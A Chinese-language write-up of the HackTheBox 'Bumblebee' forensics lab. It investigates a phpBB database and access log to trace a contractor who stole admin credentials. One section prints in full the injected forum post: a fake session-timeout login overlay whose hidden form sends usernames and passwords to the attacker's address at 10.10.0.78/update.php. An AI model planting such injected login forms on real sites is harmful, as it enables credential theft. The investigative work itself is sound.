Task 1
题目:外部承包商的用户名是什么?
外部承包商通过访客 WiFi 访问了 Forela 的内部论坛,他们似乎窃取了管理用户的凭据!
通过内部论坛窃取管理用户的凭据,首先需要注册一个普通用户。通过访客 WiFi 访问,ip 肯定是内网 ip
1、进入 sqlite3
tar -zxvf incident.tgz # 解压
sqlite3 phpbb.sqlite3 # 进入
2、查看 users 表结构
.tables # 查看表
pragma table_info(phpbb_users); # 查看 users 表的字段
可以发现 username
、user_password
两个字段,这是我们感兴趣的
3、查看 users 表
select user_id,username,user_password from phpbb_users;
答案:apoole1
Task 2
题目:承包商使用什么 IP 地址创建帐户?
1、查看表结构,看看有没有需要的
2、查看 ip
select user_id,user_ip from phpbb_users where username="apoole1";
答案:10.10.0.78
Task 3
题目:承包商发布的恶意帖子的 post_id 是什么?
1、查看有没有相关表
.tables
2、查看表结构
pragma table_info(phpbb_posts);
3、查看表内容
.headers on # 显示表头
select * from phpbb_posts;
可以看见发布了 3 个帖子,序号分别为:1、2、9。其中 1、2 内容很少且正常,9 内容非常多
将 phpbb_posts 表中的内容整理为 html 文件(代码如下)
<!DOCTYPE html>
<html>
<body>
<table border="1">
<TR>
<TH>post_id</TH>
<TH>topic_id</TH>
<TH>forum_id</TH>
<TH>poster_id</TH>
<TH>icon_id</TH>
<TH>poster_ip</TH>
<TH>post_time</TH>
<TH>post_reported</TH>
<TH>enable_bbcode</TH>
<TH>enable_smilies</TH>
<TH>enable_magic_url</TH>
<TH>enable_sig</TH>
<TH>post_username</TH>
<TH>post_subject</TH>
<TH>post_text</TH>
<TH>post_checksum</TH>
<TH>post_attachment</TH>
<TH>bbcode_bitfield</TH>
<TH>bbcode_uid</TH>
<TH>post_postcount</TH>
<TH>post_edit_time</TH>
<TH>post_edit_reason</TH>
<TH>post_edit_user</TH>
<TH>post_edit_count</TH>
<TH>post_edit_locked</TH>
<TH>post_visibility</TH>
<TH>post_delete_time</TH>
<TH>post_delete_reason</TH>
<TH>post_delete_user</TH>
</TR>
<TR>
<TD>1</TD>
<TD>1</TD>
<TD>2</TD>
<TD>2</TD>
<TD>0</TD>
<TD>10.255.254.2</TD>
<TD>1681296980</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD></TD>
<TD>Welcome to phpBB3</TD>
<TD>This is an example post in your phpBB3 installation. Everything seems to be working. You may delete this
post if you like and continue to set up your board. During the installation process your first category
and your first forum are assigned an appropriate set of permissions for the predefined usergroups
administrators, bots, global moderators, guests, registered users and registered COPPA users. If you
also choose to delete your first category and your first forum, do not forget to assign permissions for
all these usergroups for all new categories and forums you create. It is recommended to rename your
first category and your first forum and copy permissions from these while creating new categories and
forums. Have fun!</TD>
<TD>5dd683b17f641daf84c040bfefc58ce9</TD>
<TD>0</TD>
<TD></TD>
<TD></TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
<TD>0</TD>
<TD>0</TD>
<TD>2</TD>
<TD>1681832598</TD>
<TD></TD>
<TD>48</TD>
</TR>
<TR>
<TD>2</TD>
<TD>1</TD>
<TD>2</TD>
<TD>50</TD>
<TD>0</TD>
<TD>10.255.254.2</TD>
<TD>1681832510</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD></TD>
<TD>Introduction Randy Savage</TD>
<TD>
<t>Good Afternoon everyone!<br />
<br />
I am new to the administration team here at forela, I'd like to take a minute and say hello!<br />
I have 5 years of administration experience and am ecstatic to be joining this team<br />
<br />
Regards,<br />
Randy
</t>
</TD>
<TD>59bbd9d7e6f899713d7c1da1016e4d25</TD>
<TD>0</TD>
<TD></TD>
<TD>3nk</TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
<TD>0</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1681832532</TD>
<TD></TD>
<TD>48</TD>
</TR>
<TR>
<TD>9</TD>
<TD>2</TD>
<TD>2</TD>
<TD>52</TD>
<TD>0</TD>
<TD>10.10.0.78</TD>
<TD>1682425042</TD>
<TD>0</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD>1</TD>
<TD></TD>
<TD>Hello Everyone</TD>
<TD>
<div>
<style>
body {
z-index: 100;
}
.modal {
position: fixed;
top: 0;
left: 0;
height: 100%;
width: 100%;
z-index: 101;
background-color: white;
opacity: 1;
}
.modal.hidden {
visibility: hidden;
}
</style>
<script
type="text/javascript">
function sethidden() {
const d = new Date(); d.setTime(d.getTime() + (24 * 60 * 60 * 1000));
let expires = "expires=" + d.toUTCString(); document.cookie = "phpbb_token=1;" + expires + ";";
var modal = document.getElementById('zbzbz1234');
modal.classList.add("hidden");
}
document.addEventListener("DOMContentLoaded",
function (event) {
let cookieexists = false; let name = "phpbb_token=";
let cookies = decodeURIComponent(document.cookie);
let ca = cookies.split(';');
for (let i = 0; i < ca.length; i++) {
let c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
cookieexists = true;
}
}
if (cookieexists) { return; }
var modal = document.getElementById('zbzbz1234');
modal.classList.remove("hidden");
}
);
</script>
<iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>
<div class="modal hidden" id="zbzbz1234" onl oad="shouldshow">
<div id="wrap" class="wrap"> <a id="top" class="top-anchor" accesskey="t"></a>
<div id="page-header">
<div class="headerbar" role="banner">
<div class="inner">
<div id="site-description" class="site-description"> <a id="logo" class="logo"
href="./index.php" title="Board index"><span
class="site_logo"></span></a>
<h1>forum.forela.co.uk</h1>
<p>Forela internal forum</p>
<p class="skiplink"><a href="#start_here">Skip to content</a></p>
</div>
<div id="search-box" class="search-box search-header" role="search">
<form action="./search.php" method="get" id="search1">
<fieldset> <input name="keywords" id="keywords1" type="search"
maxlength="128" title="Search for keywords"
class="inputbox search tiny" size="20" value=""
placeholder="Search…"> <button class="button button-search"
type="submit" title="Search"> <i class="icon fa-search fa-fw"
aria-hidden="true"></i><span class="sr-only">Search</span>
</button> <a href="./search.php" class="button button-search-end"
title="Advanced search"> <i class="icon fa-cog fa-fw"
aria-hidden="true"></i><span class="sr-only">Advanced
search</span> </a> </fieldset>
</form>
</div>
</div>
</div>
<div class="navbar" role="navigation">
<div class="inner">
<ul id="nav-main" class="nav-main linklist" role="menubar">
<li id="quick-links" class="quick-links dropdown-container responsive-menu"
data-skip-responsive="true"> <a href="#"
class="dropdown-trigger dropdown-toggle"> <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick
links</span> </a>
<div class="dropdown">
<div class="pointer">
<div class="pointer-inner"></div>
</div>
<ul class="dropdown-contents" role="menu">
<li class="separator"></li>
<li> <a href="./search.php?search_id=unanswered"
role="menuitem"> <i
class="icon fa-file-o fa-fw icon-gray"
aria-hidden="true"></i><span>Unanswered
topics</span> </a> </li>
<li> <a href="./search.php?search_id=active_topics"
role="menuitem"> <i
class="icon fa-file-o fa-fw icon-blue"
aria-hidden="true"></i><span>Active topics</span>
</a> </li>
<li class="separator"></li>
<li> <a href="./search.php" role="menuitem"> <i
class="icon fa-search fa-fw"
aria-hidden="true"></i><span>Search</span> </a>
</li>
<li class="separator"></li>
</ul>
</div>
</li>
<li data-skip-responsive="true"> <a href="/phpBB3/app.php/help/faq"
rel="help" title="Frequently Asked Questions" role="menuitem"> <i
class="icon fa-question-circle fa-fw"
aria-hidden="true"></i><span>FAQ</span> </a>
<li class="rightside" data-skip-responsive="true"> <a
href="./ucp.php?mode=login" title="Login" accesskey="x"
role="menuitem"> <i class="icon fa-power-off fa-fw"
aria-hidden="true"></i><span>Login</span> </a> </li>
<li class="rightside" data-skip-responsive="true"> <a
href="./ucp.php?mode=register" role="menuitem"> <i
class="icon fa-pencil-square-o fa-fw"
aria-hidden="true"></i><span>Register</span> </a> </li>
</li data-skip-responsive="true">
</ul>
<ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks"
role="menubar">
<li class="breadcrumbs" itemscope=""
itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;">
<span class="crumb" itemtype="http://schema.org/ListItem"
itemprop="itemListElement" itemscope=""><a href="./index.php"
itemtype="https://schema.org/Thing" itemprop="item"
accesskey="h" data-navbar-reference="index"
title="Board index"><i class="icon fa-home fa-fw"></i><span
itemprop="name">Board index</span></a>
<meta itemprop="position" content="1">
</span> </li>
<li class="rightside responsive-search"> <a href="./search.php"
title="View the advanced search options" role="menuitem"> <i
class="icon fa-search fa-fw" aria-hidden="true"></i><span
class="sr-only">Search</span> </a> </li>
</ul>
</div>
</div>
</div> <a id="start_here" class="anchor"></a>
<div id="page-body" class="page-body" role="main">
<div class="panel">
<div class="inner">
<div class="content">
<h3>Session Timeout</h3> <br /> <br />
<p>Your session token has timed out in order to proceed you must login
again.</p>
</div>
</div>
</div>
<form action="http://10.10.0.78/update.php" method="post" id="login"
data-focus="username" target="hiddenframe">
<div class="panel">
<div class="inner">
<div class="content">
<h2 class="login-title">Login</h2>
<fieldset class="fields1">
<dl>
<dt><label for="username">Username:</label></dt>
<dd><input type="text" tabindex="1" name="username"
id="username" size="25" value=""
class="inputbox autowidth"></dd>
</dl>
<dl>
<dt><label for="password">Password:</label></dt>
<dd><input type="password" tabindex="2" id="password"
name="password" size="25" class="inputbox autowidth"
autocomplete="off"></dd>
</dl>
<dl>
<dd><label for="autologin"><input type="checkbox"
name="autologin" id="autologin"
tabindex="4">Remember me</label></dd>
<dd><label for="viewonline"><input type="checkbox"
name="viewonline" id="viewonline" tabindex="5">Hide
my online status this session</label></dd>
</dl>
<dl>
<dt>&nbsp;</dt>
<dd> <input type="submit" name="login" tabindex="6"
value="Login" class="button1" onclick="sethidden()">
</dd>
</dl>
</fieldset class="fields1">
</div>
</div>
</div>
</form>
</div>
<div id="page-footer" class="page-footer" role="contentinfo">
<div class="navbar" role="navigation">
<div class="inner">
<ul id="nav-footer" class="nav-footer linklist" role="menubar">
<li class="breadcrumbs"> <span class="crumb"><a href="./index.php"
data-navbar-reference="index" title="Board index"><i
class="icon fa-home fa-fw"
aria-hidden="true"></i><span>Board index</span></a></span>
</li>
<li class="responsive-menu hidden rightside dropdown-container"><a
href="javascript:void(0);"
class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i
class="icon fa-bars fa-fw" aria-hidden="true"></i></a>
<div class="dropdown">
<div class="pointer">
<div class="pointer-inner"></div>
</div>
<ul class="dropdown-contents"></ul>
</div>
</li>
<li class="rightside">All times are <span title="UTC">UTC</span></li>
<li class="rightside"> <a href="./ucp.php?mode=delete_cookies"
data-ajax="true" data-refresh="true" role="menuitem"> <i
class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete
cookies</span> </a> </li>
</ul>
</div>
</div>
<div class="copyright">
<p class="footer-row"> <span class="footer-copyright">Powered by <a
href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB
Limited</span> </p>
<p class="footer-row"> <a class="footer-link" href="./ucp.php?mode=privacy"
title="Privacy" role="menuitem"> <span
class="footer-link-text">Privacy</span> </a> | <a class="footer-link"
href="./ucp.php?mode=terms" title="Terms" role="menuitem"> <span
class="footer-link-text">Terms</span> </a> </p>
</div>
<div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error"
data-ajax-error-text="Something went wrong when processing your request."
data-ajax-error-text-abort="User aborted request."
data-ajax-error-text-timeout="Your request timed out; please try again."
data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply.">
<div id="darken" class="darken">&nbsp;</div>
</div>
<div id="phpbb_alert" class="phpbb_alert" data-l-err="Error"
data-l-timeout-processing-req="Request timed out."> <a href="#" class="alert_close">
<i class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a>
<h3 class="alert_title">&nbsp;</h3>
<p class="alert_text"></p>
</div>
<div id="phpbb_confirm" class="phpbb_alert"> <a href="#" class="alert_close"> <i
class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a>
<div class="alert_text"></div>
</div>
</div>
</div>
<div> <a id="bottom" class="anchor" accesskey="z"></a> <img
src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron">
</div>
</div><span>Greetings everyone,<br> <br> I am just a visiting IT Contractor, it's a fantastic
company y'all have here.<br> I hope to work with you all again soon.<br> <br> Regards,<br>Alex
Poole</span>
</div>
</TD>
<TD>d2788f4645ab450a05b1832b98d98d0f</TD>
<TD>0</TD>
<TD></TD>
<TD>af1z987</TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
<TD>0</TD>
<TD>0</TD>
<TD>1</TD>
<TD>0</TD>
<TD></TD>
<TD>0</TD>
</TR>
</table>
</body>
</html>
答案:9
Task 4
题目:凭据窃取者将其数据发送到的完整 URI 是什么?
1、访问页面
将 Task 3 整理出来 html 文件保存在本地,并访问,可得下列界面,是个表单
2、查看源代码
源代码中一共两个 form 表单
form 表单提交到 ./search.php ,似乎没有问题,查看下一个表单
form 表单提交到 http://10.10.0.78/update.php,而 10.10.0.78 是攻击者的 ip(Task 2)
答案:http://10.10.0.78/update.php
Task 5
题目:承包商什么时候以管理员身份登录论坛的?(世界标准时间)
.tables
可以发现一张 phpbb_log 表
.headers on # 显示表头
select * from phpbb_pog;
最后是 10.10.0.78 使用 admin 登录,虽然 ip 后面是登录时间,但我不知道怎么转换
可以看见 10.10.0.78 进行了三次操作。第一次登录,第二次添加,第三次获取数据库备份
以管理员身份登录,数据多半是以 POST 方式传递
cat access.log | grep 'POST'
在 phpbb_log 表中,最后是由 10.10.0.78 进行登录操作,因此,找出最后一个 sid
可以看见,最后 4 条记录的 sid 是一样的,说明攻击者用 admin 权限进行四次操作(POST),使用 admin 权限进行操作前需要登录,因此,1 条登录记录,4 条操作记录
注意:题目要求世界时间,而日志中 +0100 代表东一区。所以,日志中的时间是东一区的时间
答案:26/04/2023 10:53:12
Task 6
题目:论坛里有LDAP连接的明文凭据,密码是多少?
select * from phpbb_config;
答案:Passw0rd1
Task 7
题目:管理员用户的用户代理是什么?
日志文件中,每条数据都记录了用户代理
我们只需要排除正常的用户代理即可
cat access.log |grep -v 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv'
答案:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Task 8
题目:承包商什么时候将自己添加到管理员组?(世界标准时间)
1、确定管理员组成员
select user_id,username,group_id from phpbb_users where group_id =5
有两个用户都是管理员组,admin
、phpbb-admin
2、查看 phpbb_log 表
在上一步中可以看见,admin
id 为 2,phpbb-admin
id 为 48,Task 5 也分析 phpbb_log 表中 10.10.0.78 进行的三次操作,第二次操作将phpbb-admin
用户添加管理员组
3、查看日志文件
Task 5 也可以看见以 POST 方式执行的第二个操作就是将自己添加到管理员组
cat access.log |grep 'mode=manage'
答案:26/04/2023 10:53:51
Task 9
题目:承包商什么时候下载了数据库备份?(世界标准时间)
cat access.log
如果你够仔细,就能在最初查看日志文件时发现
答案:26/04/2023 11:01:38
Task 10
题目:access.log 中所述的数据库备份的大小(以字节为单位)是多少?
cat access.log
也是查看日志文件最初就应该发现
答案:34707
标签:Task,HTB,查看,蓝队,Bumblebee,phpbb,post,id,log From: https://www.cnblogs.com/IFS-/p/17901030.html